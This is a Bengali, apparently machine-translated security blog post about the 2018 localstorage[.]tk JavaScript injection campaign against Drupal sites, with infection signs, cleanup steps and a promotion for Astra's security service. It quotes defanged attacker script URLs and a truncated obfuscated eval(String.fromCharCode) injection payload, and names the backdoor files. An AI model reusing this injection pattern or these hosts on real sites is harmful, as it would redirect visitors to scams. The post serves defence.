2018 সালের বসন্ত ড্রুপাল দুর্বলতা থেকে উদ্ভূত সংক্রমণের সংখ্যায় আশ্চর্যজনক বৃদ্ধি দেখেছে। ওয়ার্ডপ্রেস এবং জুমলা, এবং বিশ্বব্যাপী বেশ কয়েকটি ব্যবসার জন্য ক্যাটারিং করা, ড্রুপাল সম্প্রতি আরেকটি দূষিত আক্রমণের শিকার হয়েছে।
ড্রুপাল ব্যবহারকারীরা বর্তমানে একটি স্থানীয় স্টোরেজ [.tk] আক্রমণের সাথে সাম্প্রতিকতম সংক্রমণের একটি বিশাল বৃদ্ধি মোকাবেলা করছে। এই সংক্রমণটি ব্যবহারকারীদের “js.localstorage[.]tk”-এর মাধ্যমে “টেক সাপোর্ট” স্ক্যামে পুনঃনির্দেশ করে হাজার হাজার Drupal ওয়েবসাইটকে প্রভাবিত করেছে।
দি ড্রুপাল সংক্রমণ
এই ড্রুপাল শোষণ একটি দূষিত জাভাস্ক্রিপ্ট কোডের মাধ্যমে প্রকাশ পায়, যা বিভিন্ন .tpl.php-এ ইনজেক্ট করা হয় , .html.twig এবং .js নথি পত্র. ক্ষতিকারক স্ক্রিপ্টটি hxxps://js.localstorage[.]tk/s.js?crt=new থেকে ইনজেক্ট করা হয়েছে , অথবা বিকল্পভাবে hxxp://193.201.224 .233/m.js?d=3 থেকে লোড করা যেতে পারে , যা দূষিত পুনঃনির্দেশের দিকে নিয়ে যায়। তাছাড়া, কোডটি ক্ষতিকারক স্ক্রিপ্টটিকে ডাটাবেসের মধ্যে অনেক অন্যান্য স্থানে প্রবেশ করায়।
[code inline="true" scrollable="true"]eval (String .fromCharCode(118, 97, 114, 32, 122, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, ...skipped... 100, 40, 122, 41, 59)); [/code]
Drupal:আক্রান্ত পৃষ্ঠাগুলিতে উপরের JavaScript কোড থাকে
ফাইল এবং ডাটাবেস থেকে এই দূষিত জাভাস্ক্রিপ্ট কোডগুলি বাদ দেওয়া নিরর্থক হতে পারে, কারণ হ্যাকাররা ফাইলগুলিকে পুনরায় সংক্রামিত করার জন্য ফাইলগুলি তৈরি করেছে যদি সেগুলি পরিষ্কার হয় বলে সন্দেহ হয়৷ এই ফাইলগুলিতে সাধারণত “g.php-এর মতো এলোমেলো ফাইলের নাম থাকতে দেখা যায় ”, “tonure.php ”, অথবা “jooner.php ”।
নিম্নলিখিত ম্যালওয়্যার ইনজেক্টর কোড যা দূষিত জাভাস্ক্রিপ্ট ফাইলকে .tpl.php-এ ইনজেক্ট করে , .html.twig , header.php, এবং drupal.js ফাইল।
ম্যাসিভ লোকাল স্টোরেজের কিছু সাধারণ লক্ষণ[.]tk ড্রুপাল সংক্রমণের মধ্যে রয়েছে:
- Index.php ফাইলগুলি সাবডিরেক্টরিতে তৈরি করা হচ্ছে যেখানে সেগুলি হওয়ার কথা নয়৷
- “g.php”, “tonure.php”, “jooner.php” বা stats.php এর মত এলোমেলো ফাইলনাম সহ পাবলিক ফাইল এবং ফোল্ডারে সন্দেহজনক ফাইলের আবিষ্কার। এছাড়াও, সন্দেহজনক .ico ফাইল এবং PHP ফাইলগুলি আবিষ্কার করার ক্ষেত্রে সন্দেহ দেখা দিতে পারে যেগুলির সন্দেহজনক হেক্স নাম রয়েছে৷
- একটি .ico এক্সটেনশন এবং একটি index.php পারমিশন 0755 সহ র্যান্ডম অক্ষর সহ ফাইলগুলির আবিষ্কার যাতে public_html থেকে সাইটের প্রতিটি ডিরেক্টরি এবং সাবডিরেক্টরিতে .ico অন্তর্ভুক্ত থাকে।
- suPHP চলমান একটি সার্ভারে 500 সার্ভার ত্রুটির একটি ঘটনা ঘটেছে public_html-এ 777-এ অনুমতি পরিবর্তন করার জন্য।
- ডাটাবেসে হ্যাকিং স্ক্রিপ্টের উল্লেখ যেমন %localstorage% এর ঘটনা ডাটাবেসের রেফারেন্স।
ড্রুপাল শোষণের বিরুদ্ধে প্রশমন:স্থানীয় স্টোরেজ[.]tk সংক্রমণ
যদিও ক্ষয়ক্ষতি ইতিমধ্যেই হয়ে যেতে পারে, সমন্বিত প্রশমন কৌশলের একটি সেট অনুসরণ করলে এই ড্রুপাল দুর্বলতার বিরুদ্ধে আরও যে কোনো শোষণ এবং প্রশমিত হতে পারে। নিম্নলিখিত পদক্ষেপগুলি এই ড্রুপাল সংক্রমণকে অপসারণ করতে এবং ভবিষ্যতের দুর্বলতার বিরুদ্ধে প্রশমিত করতে ব্যবহার করা যেতে পারে:
- ড্রুপাল সংস্করণ আপগ্রেড করুন: এই সংক্রমণ পরিষ্কার করার জন্য, এটি সম্পূর্ণরূপে প্যাচ এবং সর্বশেষ Drupal সংস্করণে আপগ্রেড করার পরামর্শ দেওয়া হয় (অন্তত Drupal 7.59, Drupal 8.5.3, বা Drupal 8.4.8)
- পেছনের দরজা মুছে ফেলুন :আপনাকে সমস্ত ব্যাকডোর (দূষিত ক্রোন কাজ অন্তর্ভুক্ত) মুছে ফেলতে হবে এবং তারপরে সংক্রামিত ড্রুপাল ফাইল এবং ডাটাবেস থেকে ইনজেকশন করা ম্যালওয়্যারটি সরিয়ে ফেলতে হবে। ব্যাকডোর অপসারণ করতে ব্যর্থ হলে আপনার ড্রুপাল সাইট ম্যালওয়্যারের সাথে পুনরায় পরিচিত হতে পারে এবং আপনি যে ফাইলগুলি পরিষ্কার/প্রতিস্থাপন করেছেন সেগুলি আবার সংক্রামিত হবে৷
- একটি ভিন্ন উপায়ে সংক্রমণ অপসারণ করার ফলে অবিলম্বে পুনরায় ইনজেকশন হতে পারে এমন একটি সুযোগ রয়েছে। Astra এর নির্দেশিকা অনুসরণ করার পরামর্শ দেওয়া হচ্ছে একটি হ্যাকড ড্রুপাল সাইট পরিষ্কার করার বিষয়ে৷
- অফিসিয়াল ড্রুপাল ফোরামে ব্যাখ্যা করা ধাপে ধাপে নির্দেশিকা অনুসরণ করুন
- এটি অত্যন্ত সুপারিশ করা হয় যে একটি ওয়েবসাইট ফায়ারওয়াল নিয়োগ করুন যা আসন্ন হুমকির বিরুদ্ধে অবিলম্বে আপনার সাইটগুলিকে প্যাচ করে, আবিষ্কৃত দুর্বলতাগুলি সম্পর্কে আপনাকে ভালভাবে অবহিত করে বা প্যাচ/সংস্করণ প্রকাশের সাথে সাথে আপনার সাইটটিকে প্যাচ/আপডেট করার জন্য আপনাকে অবহিত করে৷
এই ধরনের অনলাইন আক্রমণের বিরুদ্ধে আপনার ড্রুপাল সাইটের জন্য জলরোধী নিরাপত্তা খুঁজছেন? আপনি ব্যবসা করার সময় নিরাপত্তা নিশ্চিত করতে Astra-এর Drupal Securit Suite-এর জন্য আবেদন করুন।
তাৎক্ষণিক সাহায্যের জন্য, dচ্যাট উইজেটে আমাদের একটি বার্তা পাঠান।
ডেভেলপারদের জন্য নিরাপদ কোডিং অনুশীলন চেকলিস্টের জন্য Astra-এর গাইড ডাউনলোড করুন